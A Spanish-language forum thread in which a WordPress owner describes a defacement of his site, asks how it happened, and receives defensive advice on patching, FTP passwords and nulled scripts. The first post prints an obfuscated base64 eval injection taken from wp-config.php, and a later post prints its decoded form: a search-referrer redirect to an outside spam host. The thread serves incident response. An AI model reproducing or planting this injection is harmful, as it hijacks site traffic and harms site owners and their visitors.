Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen

rogertm · #1 (**permalink**) 19/05/2010, 07:55

Buenos días, no estoy seguro de que sea aquí donde deba publicar este post, pero buej, allá va.

El asunto es que esta mañana me entero de que me han hackeado uno de mis sitios (Wordpress) hospedado en Site5.com. Lo que hicieron fue renombrar el archivo index.php a index2.php, colgaron un nuevo index.php con el siguiente código:

Código HTML:

Ver original<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>blackraptor@root~#</title>
</head>
<body bgcolor="#000000">
<div align="center">
    <pre class="style1"><span class="style10"><strong><font size="3" color="#FFFFFF">Ups don't Worry, Your System is Save</font></strong></span></pre>
</div>
<div align="center">
    <pre id="line1" class="style1"><font color="#FFFFFF" size="6"><strong><span class="style10">::: ThiS Site Has Been Hacked :::</span></strong></font></pre>
</div>
<p align="center"><b><font face="Calisto MT" size="7" color="#FF0000">Indonesian</font><font color="#FFFFFF" face="Calisto MT" size="7"> 
Hacker</font></b></p>
<p align="center"><b><font face="Courier New" size="4" color="#FFFFFF">Contact : 
[email protected]</font></b></p>
</body>
</html>

Por suerte decía don't Worry, Your System is Save... y en el wp-config.php me metieron un script injection:

Código PHP:

Ver original<?php/*
eval(base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJnb29nbGUiKSkgewoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpewoJCXByZWdfbWF0Y2ggKCIvcVw9KC4qKS8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsKCQlpZiAoc3RyaXN0cigka2tbMV0sIiYiKSkgewoJCQlwcmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOwoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtleTJbMV0pOwoJCX1lbHNlIHsKCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRra1sxXSk7CgkJfQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRrZXl3b3JkKTsKCQlleGl0KCk7Cgl9Cgp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9vIikpIHsKcHJlZ19tYXRjaCAoIi9wXD0oLio/KSYvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7CgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnbmZkZnRocnYuYmVlLnBsLz9xPSIuJGtrWzFdKTsKCQlleGl0KCk7Cn1lbHNlaWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7CnByZWdfbWF0Y2ggKCIvcVw9KC4qPykmLyIsJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwka2spOwoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRra1sxXSk7CgkJZXhpdCgpOwp9Cgk="));*/
 
// A partir de aquí todo estaba correctamente
 
?>

Hace poco me pasó algo muy parecido con el sitio que administro en mi trabajo.

Preguntas:

¿Cómo es que logran hacer eso?
¿Qué medidas puedo tomar para que no suceda más?
¿Debería cambiar el password de conexión a la base de datos?

Saludos y muchas gracias de antemano...

JoshMex · #2 (**permalink**) 19/05/2010, 08:23

- Algún script con algún bug, actualiza tus scripts a las últimas versiones.

- Robo de los datos de tu cuenta FTP, revisa que tu equipo tenga todos los parches instalados, existe un virus llamado gumblar que aprovecha una vulnerabilidad y roba de tus clientes ftp los datos de tus cuentas ftp; cambia el password de tus cuentas ftp

netandino · #3 (**permalink**) 19/05/2010, 08:38

Pasa en muchas veces cuando uno usa csm themes o similares free y estos traen huecos o cuando hace uso de scrips nulled. al hacer esto terminan siendo defaseados.

Los recomendable es revisar al detalle sus scripts y tener actualizados todos sus scripts, evite también el uso de script nulled en muchas veces apropósito dejan hoyos para poder tomar su cuenta.

Saludos

WebTech · #4 (**permalink**) 19/05/2010, 11:07

Esto puede suceder por:

* Scripts desactualizados, vulnerables
* Excesivo uso de permisos en archivos y carpetas
* Robo de contraseñas
* Infección a nivel de servidor

Pregunta a tu proveedor de hosting, ellos deberían poder decirte cómo fueron modificados los archivos y de allí evaluar si fue por ftp, php-apache, etc.

Saludos,

rogertm · #5 (**permalink**) 19/05/2010, 12:30

OK, gracias a todos por las recomendaciones, ya iré revisando el asunto a ver donde esté el hueco... Por cierto, que es exactamente script nulled? He buscado por Internet y no he encontrado ninguna definición del término...

Gracias...

WebTech · #6 (**permalink**) 19/05/2010, 14:10

Cita:

script nulled

Un script crackeado, ilegal por supuesto, puedes encontrar foros y otras aplicaciones PHP donde puedes usarlas sin restricciones de igual manera que las hubieses pagado.

Saludos,

rogertm · #7 (**permalink**) 19/05/2010, 14:36

Gracias, por si sirve de algo aquí dejo la "Hoja de Servicios" del marine que nos ha visitado esta mañana http://zone-h.net/archive/notifier=black_raptor/

jaiak · #8 (**permalink**) 22/05/2010, 19:50

Preguntaste a ver si también habían sido hackeadas webs de vecinos tuyos en el mismo servidor?

caelus · #9 (**permalink**) 22/05/2010, 22:56

Quizás sea mejor contratar un webmaster profesional que diseñe el sitio, en internet hay varios manuales/videos de cómo hackear (defasear en realidad) un sitio que usa wp mediante SQL inyection por ejemplo, ese es un método.

Saludos

ccota · #10 (**permalink**) 10/02/2012, 19:03

como hago para restaurar mi web si me paso exactamente lo mismo???? gracias

IH-Antonio · #11 (**permalink**) 11/02/2012, 09:25

Hola, por si te sirve de algo, esto es lo que hay en el wp-config:

Código PHP:

      if (stristr($_SERVER[HTTP_REFERER],"google")) { 
    if (!stristr($_SERVER[HTTP_REFERER],".nu") and !stristr($_SERVER[HTTP_REFERER],"site") and !stristr($_SERVER[HTTP_REFERER],"inurl")){ 
        preg_match ("/q\=(.*)/",$_SERVER[HTTP_REFERER],$kk); 
        if (stristr($kk[1],"&")) { 
            preg_match ("/(.*?)\&/",$kk[1],$key2); 
            $keyword=urldecode($key2[1]); 
        }else { 
            $keyword=urldecode($kk[1]); 
        } 
        header("Location: http://fgnfdfthrv.bee.pl/?q=".$keyword); 
        exit(); 
    } 
 
}elseif (stristr($_SERVER[HTTP_REFERER],"yahoo")) { 
preg_match ("/p\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk); 
        header("Location: http://fgnfdfthrv.bee.pl/?q=".$kk[1]); 
        exit(); 
}elseif (stristr($_SERVER[HTTP_REFERER],"bing")) { 
preg_match ("/q\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk); 
        header("Location: http://fgnfdfthrv.bee.pl/?q=".$kk[1]); 
        exit(); 
}

hasdpk · #12 (**permalink**) 11/02/2012, 09:29

Yo creo que este tema ya está más que solucionado, @ccota a reactivado el tema que se escribió en el 2010.